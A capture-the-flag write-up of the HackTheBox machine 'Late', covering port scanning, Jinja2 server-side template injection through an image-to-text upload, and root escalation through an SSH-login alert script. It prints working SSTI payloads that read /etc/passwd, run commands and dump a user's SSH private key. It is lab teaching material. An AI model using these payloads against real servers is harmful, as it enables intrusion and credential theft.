CTF-Writeups/HackTheBox/Late.md

HackTheBox - Late

NMAP

Nmap scan report for 10.10.11.156
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On port 80 it's nginx hosting a web page having a domain images.late.htb

Let's add the domain name in /etc/hosts file

So here let's try uploading an image with a text and see if it actually converts the image into text form

I grabbed this image for the test and after uploading, we get a file name results.txt with the image text

Foothold

We can now try to test for SSTI since this a flask application as the main page says, jinja2 is normally used for templates, we can try {{7*'7'}} and if it returns 7777777 then it's vulnerable to SSTI and is using jinja2 else it would return 49 if it would be using twig

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---basic-injection

So to make this work, we can take a screenshot of {{7*'7'}} on a text editor and save it as an image

It works, now it's time to test for command execution. We can use this payload to test if we can can read files

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

After uploading this we get the /etc/passwd file

Now we can't get a reverse shell from where even tho we can execute commands with

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Which would return us

Instead we can grab the ssh key for svc_acc

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/svc_acc/.ssh/id_rsa').read() }}

After getting shell, we can check what's running in the background for that we can use pspy

On looking at the script it looks like a normal ssh alert which is sent to root'users mail but if we notice in pspy that script is being executed whenever we login through ssh

So we just need to add shell commands to it and it will be executed, so I'll be adding a bash reverse shell

After logging in back the script will be executed and we'll have our reverse shell as root user

References

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---basic-injection
• https://www.geeksforgeeks.org/chattr-command-in-linux-with-examples/